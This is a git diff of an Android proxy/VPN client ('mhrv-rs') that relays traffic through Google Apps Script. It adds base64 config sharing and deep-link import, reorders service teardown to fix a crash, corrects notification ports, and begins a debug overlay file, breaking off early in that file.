-                    else -> SplitMode.ALL
-                },
-                splitApps = obj.optJSONArray("split_apps")?.let { arr ->
-                    buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
-                }?.filter { it.isNotBlank() }.orEmpty(),
-                uiLang = when (obj.optString("ui_lang", "auto")) {
-                    "fa" -> UiLang.FA
-                    "en" -> UiLang.EN
-                    else -> UiLang.AUTO
-                },
-            )
+            loadFromJson(JSONObject(f.readText()))
         } catch (_: Throwable) {
             MhrvConfig()
         }
@@ -292,6 +308,181 @@ object ConfigStore {
         val f = File(ctx.filesDir, FILE)
         f.writeText(cfg.toJson())
     }
+
+    /** Prefix for encoded config strings so we can detect them in clipboard. */
+    private const val HASH_PREFIX = "mhrv-rs://"
+
+    /** Encode config as a shareable base64 string with prefix.
+     *  Only includes non-default fields to keep the hash short. */
+    fun encode(cfg: MhrvConfig): String {
+        val defaults = MhrvConfig()
+        val obj = JSONObject()
+
+        // Always include essential fields.
+        obj.put("mode", when (cfg.mode) {
+            Mode.APPS_SCRIPT -> "apps_script"
+            Mode.DIRECT -> "direct"
+            Mode.FULL -> "full"
+        })
+        val ids = cfg.appsScriptUrls.mapNotNull { url ->
+            val marker = "/macros/s/"
+            val i = url.indexOf(marker)
+            if (i >= 0) {
+                var s = url.substring(i + marker.length)
+                val slash = s.indexOf('/'); if (slash >= 0) s = s.substring(0, slash)
+                s.trim().ifEmpty { null }
+            } else url.trim().ifEmpty { null }
+        }
+        if (ids.isNotEmpty()) obj.put("script_ids", JSONArray().apply { ids.forEach { put(it) } })
+        if (cfg.authKey.isNotBlank()) obj.put("auth_key", cfg.authKey)
+
+        // Only include non-default values.
+        if (cfg.googleIp != defaults.googleIp) obj.put("google_ip", cfg.googleIp)
+        if (cfg.frontDomain != defaults.frontDomain) obj.put("front_domain", cfg.frontDomain)
+        if (cfg.sniHosts.isNotEmpty()) obj.put("sni_hosts", JSONArray().apply { cfg.sniHosts.forEach { put(it) } })
+        if (cfg.verifySsl != defaults.verifySsl) obj.put("verify_ssl", cfg.verifySsl)
+        if (cfg.logLevel != defaults.logLevel) obj.put("log_level", cfg.logLevel)
+        if (cfg.parallelRelay != defaults.parallelRelay) obj.put("parallel_relay", cfg.parallelRelay)
+        if (cfg.forceHttp1 != defaults.forceHttp1) obj.put("force_http1", cfg.forceHttp1)
+        if (cfg.coalesceStepMs != defaults.coalesceStepMs) obj.put("coalesce_step_ms", cfg.coalesceStepMs)
+        if (cfg.coalesceMaxMs != defaults.coalesceMaxMs) obj.put("coalesce_max_ms", cfg.coalesceMaxMs)
+        if (cfg.blockQuic != defaults.blockQuic) obj.put("block_quic", cfg.blockQuic)
+        if (cfg.blockStun != defaults.blockStun) obj.put("block_stun", cfg.blockStun)
+        if (cfg.upstreamSocks5.isNotBlank()) obj.put("upstream_socks5", cfg.upstreamSocks5)
+        if (cfg.passthroughHosts.isNotEmpty()) obj.put("passthrough_hosts", JSONArray().apply { cfg.passthroughHosts.forEach { put(it) } })
+        if (cfg.tunnelDoh != defaults.tunnelDoh) obj.put("tunnel_doh", cfg.tunnelDoh)
+        if (cfg.blockDoh != defaults.blockDoh) obj.put("block_doh", cfg.blockDoh)
+        if (cfg.youtubeViaRelay != defaults.youtubeViaRelay) obj.put("youtube_via_relay", cfg.youtubeViaRelay)
+        val cleanBypassDohHosts = cfg.bypassDohHosts
+            .map { it.trim() }
+            .filter { it.isNotEmpty() }
+            .distinct()
+        if (cleanBypassDohHosts.isNotEmpty()) {
+            obj.put("bypass_doh_hosts", JSONArray().apply { cleanBypassDohHosts.forEach { put(it) } })
+        }
+
+        // Compress with DEFLATE then base64.
+        val jsonBytes = obj.toString().toByteArray(Charsets.UTF_8)
+        val compressed = java.io.ByteArrayOutputStream().also { bos ->
+            java.util.zip.DeflaterOutputStream(bos).use { it.write(jsonBytes) }
+        }.toByteArray()
+
+        val b64 = android.util.Base64.encodeToString(
+            compressed,
+            android.util.Base64.NO_WRAP or android.util.Base64.URL_SAFE,
+        )
+        return "$HASH_PREFIX$b64"
+    }
+
+    /** Try DEFLATE inflate; fall back to treating bytes as raw UTF-8
+     *  (for backward compat with uncompressed exports). */
+    private fun inflateOrRaw(raw: ByteArray): String {
+        return try {
+            java.util.zip.InflaterInputStream(raw.inputStream()).bufferedReader().readText()
+        } catch (_: Throwable) {
+            String(raw, Charsets.UTF_8)
+        }
+    }
+
+    /** Try to decode an encoded config string or raw JSON. Returns null on failure. */
+    fun decode(encoded: String): MhrvConfig? {
+        val trimmed = encoded.trim()
+        // Try raw JSON first.
+        if (trimmed.startsWith("{")) {
+            return try {
+                val obj = JSONObject(trimmed)
+                if (!obj.has("mode") && !obj.has("script_ids") && !obj.has("auth_key")) null
+                else loadFromJson(obj)
+            } catch (_: Throwable) { null }
+        }
+        // Try mhrv-rs:// base64 encoded (possibly DEFLATE-compressed).
+        val payload = if (trimmed.startsWith(HASH_PREFIX)) trimmed.removePrefix(HASH_PREFIX) else trimmed
+        return try {
+            val raw = android.util.Base64.decode(payload, android.util.Base64.NO_WRAP or android.util.Base64.URL_SAFE)
+            val text = inflateOrRaw(raw)
+            val obj = JSONObject(text)
+            if (!obj.has("mode") && !obj.has("script_ids") && !obj.has("auth_key")) return null
+            loadFromJson(obj)
+        } catch (_: Throwable) {
+            null
+        }
+    }
+
+    /** Check if a string looks like an encoded mhrv config. */
+    fun looksLikeConfig(text: String): Boolean {
+        val t = text.trim()
+        if (t.startsWith(HASH_PREFIX)) return true
+        // Also accept raw JSON with a "mode" field.
+        if (t.startsWith("{")) {
+            return try { JSONObject(t).has("mode") } catch (_: Throwable) { false }
+        }
+        return false
+    }
+
+    /** Parse config from a JSON object — shared by load() and decode(). */
+    private fun loadFromJson(obj: JSONObject): MhrvConfig {
+        val ids = obj.optJSONArray("script_ids")?.let { arr ->
+            buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
+        }?.filter { it.isNotBlank() }.orEmpty()
+        val urls = ids.map { "https://script.google.com/macros/s/$it/exec" }
+        val sni = obj.optJSONArray("sni_hosts")?.let { arr ->
+            buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
+        }?.filter { it.isNotBlank() }.orEmpty()
+
+        return MhrvConfig(
+            mode = when (obj.optString("mode", "apps_script")) {
+                "direct" -> Mode.DIRECT
+                // Deprecated alias kept forever for back-compat with
+                // configs written before the rename.
+                "google_only" -> Mode.DIRECT
+                "full" -> Mode.FULL
+                else -> Mode.APPS_SCRIPT
+            },
+            listenHost = obj.optString("listen_host", "0.0.0.0"),
+            listenPort = obj.optInt("listen_port", 8080),
+            socks5Port = obj.optInt("socks5_port", 1081).takeIf { it > 0 },
+            appsScriptUrls = urls,
+            authKey = obj.optString("auth_key", ""),
+            frontDomain = obj.optString("front_domain", "www.google.com"),
+            sniHosts = sni,
+            googleIp = obj.optString("google_ip", "142.251.36.68"),
+            verifySsl = obj.optBoolean("verify_ssl", true),
+            logLevel = obj.optString("log_level", "info"),
+            parallelRelay = obj.optInt("parallel_relay", 1),
+            forceHttp1 = obj.optBoolean("force_http1", false),
+            coalesceStepMs = obj.optInt("coalesce_step_ms", 10),
+            coalesceMaxMs = obj.optInt("coalesce_max_ms", 1000),
+            blockQuic = obj.optBoolean("block_quic", true),
+            blockStun = obj.optBoolean("block_stun", true),
+            upstreamSocks5 = obj.optString("upstream_socks5", ""),
+            passthroughHosts = obj.optJSONArray("passthrough_hosts")?.let { arr ->
+                buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
+            }?.filter { it.isNotBlank() }.orEmpty(),
+            tunnelDoh = obj.optBoolean("tunnel_doh", true),
+            blockDoh = obj.optBoolean("block_doh", true),
+            youtubeViaRelay = obj.optBoolean("youtube_via_relay", false),
+            bypassDohHosts = obj.optJSONArray("bypass_doh_hosts")?.let { arr ->
+                buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
+            }?.filter { it.isNotBlank() }.orEmpty(),
+            connectionMode = when (obj.optString("connection_mode", "vpn_tun")) {
+                "proxy_only" -> ConnectionMode.PROXY_ONLY
+                else -> ConnectionMode.VPN_TUN
+            },
+            splitMode = when (obj.optString("split_mode", "all")) {
+                "only" -> SplitMode.ONLY
+                "except" -> SplitMode.EXCEPT
+                else -> SplitMode.ALL
+            },
+            splitApps = obj.optJSONArray("split_apps")?.let { arr ->
+                buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
+            }?.filter { it.isNotBlank() }.orEmpty(),
+            uiLang = when (obj.optString("ui_lang", "auto")) {
+                "fa" -> UiLang.FA
+                "en" -> UiLang.EN
+                else -> UiLang.AUTO
+            },
+        )
+    }
 }
 
 /**
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/MainActivity.kt b/android/app/src/main/java/com/therealaleph/mhrv/MainActivity.kt
index 5aedb33c..4fb12312 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/MainActivity.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/MainActivity.kt
@@ -81,6 +81,8 @@ class MainActivity : AppCompatActivity() {
             }
         }
 
+        handleDeepLink(intent)
+
         setContent {
             MhrvTheme {
                 AppRoot()
@@ -88,6 +90,22 @@ class MainActivity : AppCompatActivity() {
         }
     }
 
+    override fun onNewIntent(intent: Intent) { // a new intent delivered to this existing activity instance
+        super.onNewIntent(intent)
+        handleDeepLink(intent) // stage any mhrv-rs deep-link config it carries for user confirmation
+    }
+
+    /** Deep-link entry point: decodes an `mhrv-rs` URI into a config and
+     *  parks it in [pendingDeepLinkConfig]. Nothing is imported here — the
+     *  value is only staged so the UI can ask the user to confirm it. */
+    private fun handleDeepLink(intent: Intent?) {
+        val uri = intent?.data
+        if (uri == null || uri.scheme != "mhrv-rs") return
+        val decoded = ConfigStore.decode(uri.toString()) ?: return
+        pendingDeepLinkConfig.value = decoded
+    }
+
+
     @Composable
     private fun AppRoot() {
         // The system VpnService.prepare() returns an Intent if the user
@@ -155,30 +173,36 @@ class MainActivity : AppCompatActivity() {
                 }
             },
             onStop = {
-                // Three-step teardown. Each step is defensive against a
-                // different failure mode we've actually hit in testing:
-                //
-                //   1. ACTION_STOP — graceful path. The service receives it,
-                //      runs its teardown (stops tun2proxy, closes the TUN
-                //      fd, shuts down the Rust runtime) and stopSelf()'s.
-                //      This is what we want 99% of the time.
+                // Single-step graceful teardown. ACTION_STOP delivered via
+                // startService() reaches MhrvVpnService.onStartCommand,
+                // which spawns the `mhrv-teardown` background thread that
+                // tears down tun2proxy + the Rust runtime and then calls
+                // stopSelf() at the end of teardown. Service stops on its
+                // own — we don't need (and must not) follow up with
+                // stopService().
                 //
-                //   2. stopService() — covers the "force-closed then
-                //      reopened" zombie case. Android may auto-restart our
-                //      START_STICKY service in a fresh process after the
-                //      user swipes us away from Recents, and the user's
-                //      next Stop tap needs to actually unbind even if our
-                //      in-memory TUN fd reference is gone. stopService is
-                //      idempotent so it's safe to follow the graceful path.
+                // History (#666 from @ilok67): we used to call stopService()
+                // immediately after startService(stopAction), as belt-and-
+                // suspenders against a "force-closed then reopened zombie"
+                // case. That second call was firing onDestroy() while the
+                // mhrv-teardown thread was still running, racing two threads
+                // through the lifecycle and crashing on tap-to-disconnect.
+                // The teardown thread's idempotency guard (tornDown
+                // AtomicBoolean) protects against double-teardown of native
+                // state, but it can't protect against OS-level lifecycle
+                // races on stopSelf vs stopService. ACTION_STOP alone is
+                // enough for both the live-service and zombie cases —
+                // startService creates a fresh service in the new process
+                // for zombies, runs teardown (no-op on already-clean state)
+                // and stops it.
                 //
-                //   3. We do NOT touch the VpnService permission — that's
-                //      the OS-wide VPN grant and the user approved it
-                //      deliberately. Revoking it would force a re-prompt
-                //      on next Start, which is worse UX.
+                // We do NOT touch the VpnService permission — that's the
+                // OS-wide VPN grant and the user approved it deliberately.
+                // Revoking it would force a re-prompt on next Start, which
+                // is worse UX.
                 val stopAction = Intent(this, MhrvVpnService::class.java)
                     .setAction(MhrvVpnService.ACTION_STOP)
                 startService(stopAction)
-                stopService(Intent(this, MhrvVpnService::class.java))
             },
             onInstallCaConfirmed = {
                 // The flow is (1) export cert, (2) copy it to Downloads so
@@ -237,5 +261,7 @@ class MainActivity : AppCompatActivity() {
 
     companion object {
         private const val REQ_NOTIF = 42
+        /** Deep-link config staged by handleDeepLink and waiting for user confirmation. Read by ConfigSharingBar. */
+        val pendingDeepLinkConfig = mutableStateOf<MhrvConfig?>(null)
     }
 }
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/MhrvApp.kt b/android/app/src/main/java/com/therealaleph/mhrv/MhrvApp.kt
index ffa71541..1e721ec4 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/MhrvApp.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/MhrvApp.kt
@@ -42,11 +42,18 @@ class MhrvApp : Application() {
         )
         val previous = Thread.getDefaultUncaughtExceptionHandler()
         Thread.setDefaultUncaughtExceptionHandler { thread, throwable ->
-            Log.e(
-                CRASH_TAG,
-                "uncaught on thread=${thread.name} (id=${thread.id}): ${throwable.message}",
-                throwable,
-            )
+            // Log.e itself can throw on extreme conditions (logd dead,
+            // OOM allocating the formatted message). If we let that
+            // bubble up, we'd recurse into our own handler with a
+            // half-handled original exception; swallow it so the
+            // previous handler still fires with the real failure.
+            try {
+                Log.e(
+                    CRASH_TAG,
+                    "uncaught on thread=${thread.name} (id=${thread.id}): ${throwable.message}",
+                    throwable,
+                )
+            } catch (_: Throwable) { }
             // Let the default handler still terminate the process and
             // show the system "app closed" dialog — we just wanted to
             // get a log line out the door first.
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/MhrvVpnService.kt b/android/app/src/main/java/com/therealaleph/mhrv/MhrvVpnService.kt
index c630a8d9..59aebb79 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/MhrvVpnService.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/MhrvVpnService.kt
@@ -35,6 +35,7 @@ class MhrvVpnService : VpnService() {
     private var proxyHandle: Long = 0L
     private var tun2proxyThread: Thread? = null
     private val tun2proxyRunning = AtomicBoolean(false)
+    private var debugOverlay: PipelineDebugOverlay? = null
 
     // Idempotency guard. teardown() is reachable from three paths:
     //   1. ACTION_STOP onStartCommand branch (background thread)
@@ -91,13 +92,23 @@ class MhrvVpnService : VpnService() {
         // path below MUST therefore happen after a `startForeground()`
         // call — otherwise the user-visible symptom is "the app crashes
         // the instant I tap Start". See issue #73.
-        startForeground(NOTIF_ID, buildNotif(cfg.listenPort))
+        // Issue #211: notification used to display
+        // `127.0.0.1:${listenPort + 1}` for the SOCKS5 port, which is
+        // wrong whenever socks5Port doesn't equal listenPort+1. With the
+        // default Android config (listenPort=8080, socks5Port=1081)
+        // users saw "Routing via SOCKS5 127.0.0.1:8081" but the real
+        // listener was on 1081 — so per-app SOCKS5 setup against the
+        // notification value silently failed. Pass the actual socks5Port
+        // (after the same elvis fallback used elsewhere) so the
+        // notification matches reality.
+        val notifSocks5Port = cfg.socks5Port ?: (cfg.listenPort + 1)
+        startForeground(NOTIF_ID, buildNotif(cfg.listenPort, notifSocks5Port))
 
         // Deployment ID + auth key are required for apps_script and full
-        // modes — both talk to Apps Script. Only google_only (bootstrap)
-        // runs without them. Closes #73 regression where google_only
-        // users hit this branch and crashed on startForeground timeout.
-        val needsCreds = cfg.mode != Mode.GOOGLE_ONLY
+        // modes — both talk to Apps Script. Only `direct` mode runs
+        // without them. Closes #73 regression where direct-mode users
+        // hit this branch and crashed on startForeground timeout.
+        val needsCreds = cfg.mode != Mode.DIRECT
         if (needsCreds && (!cfg.hasDeploymentId || cfg.authKey.isBlank())) {
             Log.e(TAG, "Config is incomplete — deployment ID + auth key required for ${cfg.mode}")
             try { stopForeground(STOP_FOREGROUND_REMOVE) } catch (_: Throwable) {}
@@ -139,6 +150,7 @@ class MhrvVpnService : VpnService() {
             Log.i(TAG, "PROXY_ONLY mode: listeners up, skipping VpnService/TUN")
             VpnState.setProxyHandle(proxyHandle)
             VpnState.setRunning(true)
+            showDebugOverlay()
             return
         }
 
@@ -242,29 +254,56 @@ class MhrvVpnService : VpnService() {
         tun = parcelFd
 
         // 3) Start tun2proxy on a worker thread. It blocks until stop() or
-        //    shutdown. We detach the fd so ownership transfers cleanly; the
-        //    ParcelFileDescriptor (`tun`) still holds a reference, so closing
-        //    it at teardown reliably tears down the TUN even if tun2proxy
-        //    doesn't cleanly exit.
+        //    shutdown. We detach the fd so ownership transfers cleanly to
+        //    tun2proxy (closeFdOnDrop = true closes it on return from run()).
+        //    The ParcelFileDescriptor (`tun`) we keep is post-detach — its
+        //    own close() is a no-op for the underlying fd, so the worker is
+        //    the sole owner once it's running.
         val detachedFd = parcelFd.detachFd()
         tun2proxyRunning.set(true)
-        tun2proxyThread = Thread({
+        // Use tun2proxy_run_with_cli_args C API via dlsym — gives full
+        // CLI flexibility including --udpgw-server, no fork needed.
+        val cliArgs = buildString {
+            append("tun2proxy")
+            append(" --proxy socks5://127.0.0.1:$socks5Port")
+            append(" --tun-fd $detachedFd")
+            append(" --dns virtual")
+            append(" --verbosity info")
+            append(" --close-fd-on-drop true")
+            if (cfg.mode == Mode.FULL) append(" --udpgw-server $UDPGW_MAGIC_DEST")
+        }
+        val worker = Thread({
             try {
-                val rc = Tun2proxy.run(
-                    "socks5://127.0.0.1:$socks5Port",
-                    detachedFd,
-                    /* closeFdOnDrop = */ true,
-                    MTU.toChar(),
-                    /* verbosity = info */ 3,
-                    /* dnsStrategy = virtual */ 0,
-                )
+                val rc = Native.runTun2proxy(cliArgs, MTU)
                 Log.i(TAG, "tun2proxy exited rc=$rc")
             } catch (t: Throwable) {
                 Log.e(TAG, "tun2proxy crashed: ${t.message}", t)
             } finally {
                 tun2proxyRunning.set(false)
             }
-        }, "tun2proxy").apply { start() }
+        }, "tun2proxy")
+        try {
+            worker.start()
+            tun2proxyThread = worker
+        } catch (t: Throwable) {
+            // Thread.start can throw OutOfMemoryError under extreme memory
+            // pressure. The fd we just detached has no owner — without an
+            // explicit close it leaks for the life of the process. Adopt
+            // it into a fresh ParcelFileDescriptor purely so we can call
+            // close() on it.
+            Log.e(TAG, "tun2proxy thread start failed: ${t.message}", t)
+            tun2proxyRunning.set(false)
+            try {
+                ParcelFileDescriptor.adoptFd(detachedFd).close()
+            } catch (closeErr: Throwable) {
+                Log.w(TAG, "adoptFd($detachedFd).close failed: ${closeErr.message}")
+            }
+            Native.stopProxy(proxyHandle)
+            proxyHandle = 0L
+            try { stopForeground(STOP_FOREGROUND_REMOVE) } catch (_: Throwable) {}
+            stopSelf()
+            return
+        }
 
         // (startForeground was already called at the top of this method
         // to satisfy Android 8+'s foreground-service contract — see the
@@ -277,6 +316,16 @@ class MhrvVpnService : VpnService() {
         // a failed-to-establish run.
         VpnState.setProxyHandle(proxyHandle)
         VpnState.setRunning(true)
+        showDebugOverlay()
+    }
+
+    private fun showDebugOverlay() { // creates the debug overlay once; needs overlay permission
+        if (debugOverlay != null) return
+        if (!android.provider.Settings.canDrawOverlays(this)) {
+            Log.w(TAG, "overlay permission not granted — skipping debug overlay")
+        } else {
+            debugOverlay = PipelineDebugOverlay(this).apply { show() }
+        }
     }
 
     /**
@@ -291,12 +340,41 @@ class MhrvVpnService : VpnService() {
      * tun2proxy still forwarding packets into a half-dead Rust runtime
      * while the runtime is force-aborting its tasks — that's the scenario
      * that manifested as "Stop crashes the app" when there were in-flight
-     * relay requests piled up against a dead Apps Script deployment. The
-     * correct order is:
-     *   1. Signal tun2proxy to stop (cooperative).
-     *   2. Close the TUN fd — forces tun2proxy's read() to return EBADF.
-     *   3. Join the tun2proxy thread (now it really will exit).
-     *   4. Shut down the Rust proxy runtime (nothing left to forward to).
+     * relay requests piled up against a dead Apps Script deployment.
+     *
+     * Steps, with the bound on each one called out so a hung native call
+     * cannot stall the whole teardown thread:
+     *   1. Shut down the Rust proxy FIRST. This closes the listening
+     *      SOCKS5 socket that tun2proxy's worker thread is blocked on
+     *      a read() from. Killing the upstream socket is what makes the
+     *      worker's blocking native call return — we have no other lever
+     *      to wake it. Bounded by `rt.shutdown_timeout(3s)` Rust-side.
+     *   2. Signal tun2proxy to stop (cooperative). Mostly redundant after
+     *      step 1, but cheap and covers the rare path where the worker is
+     *      blocked on something other than its socket read (e.g. a
+     *      smoltcp internal queue waiting on a wake). Bounded by a 2s
+     *      side-thread join.
+     *   3. Drop our `ParcelFileDescriptor` reference. Because we already
+     *      called detachFd() at startup, this is a no-op for the
+     *      underlying fd — the worker (closeFdOnDrop=true) owns it.
+     *      We keep the call only so the PROXY_ONLY / failed-establish
+     *      paths still null out the field cleanly.
+     *   4. Join the tun2proxy thread, bounded at 4s. With step 1 having
+     *      already closed the socket the worker was reading from, this
+     *      join almost always completes well under the deadline.
+     *
+     * History (#700 from @ilok67): the original order was
+     * tun2proxy → tun.close → join → stopProxy. That ordering crashed
+     * SIGSEGV ~2s after Disconnect because Native.stopProxy() freed the
+     * Rust runtime (including the SOCKS5 listener) while tun2proxy's
+     * worker was still in a blocking native read against it — classic
+     * use-after-free. The previous comment claimed "the runtime shutdown
+     * below will knock the rest of the world over," but Native.stopProxy
+     * cannot forcibly terminate a separate native thread; it just frees
+     * memory the other thread is still using. Reversing the order means
+     * the worker's blocking read returns with an EOF / socket-closed
+     * error, the worker exits through its own error path, and the join
+     * is effectively just confirming a clean shutdown.
      */
     private fun teardown() {
         // Idempotency guard. Without this, onDestroy racing the
@@ -315,25 +393,50 @@ class MhrvVpnService : VpnService() {
             "(tun2proxy running=${tun2proxyRunning.get()}, proxyHandle=$proxyHandle)",
         )
 
-        // 1. Cooperative stop signal.
+        // 1. Stop the Rust proxy FIRST. Closing the SOCKS5 listener is
+        //    what makes tun2proxy's worker thread's blocking read return
+        //    — without this the worker stays in native code and a later
+        //    Native.stopProxy would race it into use-after-free (#700).
+        val handle = proxyHandle
+        proxyHandle = 0L
+        if (handle != 0L) {
+            Log.i(TAG, "teardown: stopping proxy handle=$handle")
+            try { Native.stopProxy(handle) } catch (t: Throwable) {
+                Log.e(TAG, "Native.stopProxy threw: ${t.message}", t)
+            }
+        }
+
+        // 2. Cooperative stop signal — mostly redundant now that step 1
+        //    has yanked the socket out from under the worker, but cheap
+        //    and covers any future code path where the worker might be
+        //    blocked on something other than its upstream socket read.
+        //    Bounded so a hung JNI call can't stall teardown.
         if (tun2proxyRunning.get()) {
-            try { Tun2proxy.stop() } catch (t: Throwable) {
-                Log.w(TAG, "Tun2proxy.stop: ${t.message}")
+            val stopper = Thread({
+                try { Tun2proxy.stop() } catch (t: Throwable) {
+                    Log.w(TAG, "Tun2proxy.stop: ${t.message}")
+                }
+            }, "mhrv-tun2proxy-stop").apply { start() }
+            try { stopper.join(2_000) } catch (_: InterruptedException) {}
+            if (stopper.isAlive) {
+                Log.w(TAG, "Tun2proxy.stop did not return within 2s — proceeding")
             }
         }
 
-        // 2. Close the TUN fd. Since we called detachFd earlier the
-        //    ParcelFileDescriptor no longer owns the fd and close() here
-        //    is a no-op; the real fd is owned by tun2proxy (closeFdOnDrop
-        //    = true), which closes it on return from run().
+        // 3. Drop our PFD reference. detachFd at startup means this
+        //    close() is a no-op for the underlying fd — tun2proxy owns
+        //    it (closeFdOnDrop = true) and closes it on return from
+        //    run(). The call is kept only to null the field cleanly on
+        //    paths that never reached detachFd (PROXY_ONLY, or an
+        //    establish() that failed mid-builder).
         try { tun?.close() } catch (t: Throwable) {
             Log.w(TAG, "tun.close: ${t.message}")
         }
         tun = null
 
-        // 3. Join the worker. 4s is enough in the happy case; if tun2proxy
-        //    is stuck on something untoward we'd rather move on and force
-        //    the runtime shutdown than hang forever.
+        // 4. Join the worker. With step 1 having killed its upstream this
+        //    almost always completes immediately; the 4s budget is just
+        //    headroom for tun2proxy's internal close path to drain.
         try {
             tun2proxyThread?.join(4_000)
         } catch (_: InterruptedException) {}
@@ -343,18 +446,10 @@ class MhrvVpnService : VpnService() {
             Log.w(TAG, "tun2proxy thread still alive after join timeout — proceeding anyway")
         }
 
-        // 4. Shut down the Rust proxy. Backed by `rt.shutdown_timeout(3s)`
-        //    on the Rust side, so this is bounded even if the runtime
-        //    has in-flight tasks (common when the Apps Script relay has
-        //    piled up pending 30s timeouts).
-        val handle = proxyHandle
-        proxyHandle = 0L
-        if (handle != 0L) {
-            Log.i(TAG, "teardown: stopping proxy handle=$handle")
-            try { Native.stopProxy(handle) } catch (t: Throwable) {
-                Log.e(TAG, "Native.stopProxy threw: ${t.message}", t)
-            }
-        }
+        // Hide debug overlay before flipping UI state.
+        debugOverlay?.hide()
+        debugOverlay = null
+
         // Flip UI state last — the button reverts to Connect only after
         // the native-side cleanup actually happened, not optimistically.
         VpnState.setProxyHandle(0L)
@@ -378,7 +473,7 @@ class MhrvVpnService : VpnService() {
         Log.i(TAG, "onDestroy done")
     }
 
-    private fun buildNotif(proxyPort: Int): Notification {
+    private fun buildNotif(httpPort: Int, socks5Port: Int): Notification {
         val mgr = getSystemService(NotificationManager::class.java)
         if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
             val ch = NotificationChannel(
@@ -405,7 +500,7 @@ class MhrvVpnService : VpnService() {
         )
         return NotificationCompat.Builder(this, CHANNEL_ID)
             .setContentTitle("mhrv-rs VPN is active")
-            .setContentText("Routing via SOCKS5 127.0.0.1:${proxyPort + 1}")
+            .setContentText("HTTP 127.0.0.1:$httpPort  ·  SOCKS5 127.0.0.1:$socks5Port")
             .setSmallIcon(android.R.drawable.presence_online)
             .setContentIntent(openIntent)
             .addAction(android.R.drawable.ic_menu_close_clear_cancel, "Stop", stopIntent)
@@ -420,5 +515,14 @@ class MhrvVpnService : VpnService() {
         private const val NOTIF_ID = 0x1001
         private const val MTU = 1500
         const val ACTION_STOP = "com.therealaleph.mhrv.STOP"
+
+        // Magic udpgw destination passed to tun2proxy in Full mode. MUST stay
+        // outside tun2proxy's --dns virtual range (198.18.0.0/15) — otherwise
+        // virtual DNS can synthesise the magic IP for a real hostname and
+        // silently mis-route its traffic into the udpgw path. See issue #251
+        // and `UDPGW_MAGIC_IP` / `UDPGW_MAGIC_PORT` in tunnel-node/src/udpgw.rs.
+        // Wire-protocol convention: both sides must agree. v1.9.25+ tunnel-nodes
+        // also accept the legacy 198.18.0.1:7300 for one deprecation cycle.
+        private const val UDPGW_MAGIC_DEST = "192.0.2.1:7300"
     }
 }
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/Native.kt b/android/app/src/main/java/com/therealaleph/mhrv/Native.kt
index f016d87e..40482af9 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/Native.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/Native.kt
@@ -83,16 +83,47 @@ object Native {
      * Live traffic/usage counters for a running proxy handle. Returns a
      * JSON blob with the StatsSnapshot fields — or an empty string if the
      * handle is unknown or the proxy isn't using the Apps Script relay
-     * (google_only / full-only modes).
+     * (direct / full-only modes).
      *
      * Schema (all integer fields unless noted):
      *   relay_calls, relay_failures, coalesced, bytes_relayed,
      *   cache_hits, cache_misses, cache_bytes,
      *   blacklisted_scripts, total_scripts,
-     *   today_calls, today_bytes, today_key (string "YYYY-MM-DD"),
-     *   today_reset_secs (seconds until 00:00 UTC rollover)
+     *   today_calls, today_bytes, today_key (string "YYYY-MM-DD" in
+     *     Pacific Time — matches Apps Script's actual quota reset),
+     *   today_reset_secs (seconds until the next 00:00 Pacific Time
+     *     rollover; ~7-8 h offset from UTC depending on DST),
+     *   h2_calls (calls served by the HTTP/2 multiplexed transport,
+     *     across all entry points — Apps-Script direct, exit-node
+     *     outer call, full-mode tunnel single op, full-mode tunnel
+     *     batch. NOT comparable to relay_calls, which only sees the
+     *     Apps-Script-direct path),
+     *   h2_fallbacks (calls that attempted h2 but had to fall back
+     *     to h1 — handshake failure, open backoff, sticky ALPN
+     *     refusal, post-send error retried on h1; same all-entry-
+     *     points scope as h2_calls. Compute h2 health as
+     *     h2_calls / (h2_calls + h2_fallbacks)),
+     *   h2_disabled (boolean: true when h2 fast path is permanently
+     *     off — config force_http1 set, or peer refused h2 via ALPN)
      *
      * Cheap — just reads atomics. Safe to poll on a second-scale timer.
      */
     external fun statsJson(handle: Long): String
+
+    /**
+     * Pipeline debug snapshot (JSON). Keys read by PipelineDebugOverlay: elevated,
+     * max_elevated, active_batches, max_batch_slots, active_sessions, sessions[]
+     * (sid, depth, inflight, elevated), events[] (recent ramp/drop). Temporary debug aid.
+     */
+    external fun pipelineDebugJson(): String
+
+    /**
+     * Start tun2proxy via its CLI args C API (`tun2proxy_run_with_cli_args`).
+     * Resolved at runtime via dlsym from libtun2proxy.so — no fork needed.
+     * Blocks the calling thread until tun2proxy exits, so call it from a dedicated worker thread.
+     * @param cliArgs full CLI string, e.g. "tun2proxy --proxy socks5://... --tun-fd 42 --udpgw-server 192.0.2.1:7300"
+     * @param tunMtu TUN MTU (typically 1500)
+     * @return 0 on normal shutdown, negative on error. BLOCKS.
+     */
+    external fun runTun2proxy(cliArgs: String, tunMtu: Int): Int
 }
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/PipelineDebugOverlay.kt b/android/app/src/main/java/com/therealaleph/mhrv/PipelineDebugOverlay.kt
new file mode 100644
index 00000000..c53ac4ec
--- /dev/null
+++ b/android/app/src/main/java/com/therealaleph/mhrv/PipelineDebugOverlay.kt
@@ -0,0 +1,213 @@
+package com.therealaleph.mhrv
+
+import android.content.Context
+import android.graphics.Color
+import android.graphics.PixelFormat
+import android.os.Handler
+import android.os.Looper
+import android.util.TypedValue
+import android.view.Gravity
+import android.view.MotionEvent
+import android.view.View
+import android.view.WindowManager
+import android.widget.LinearLayout
+import android.widget.TextView
+import org.json.JSONObject
+
+/**
+ * Transparent system overlay showing pipeline debug stats.
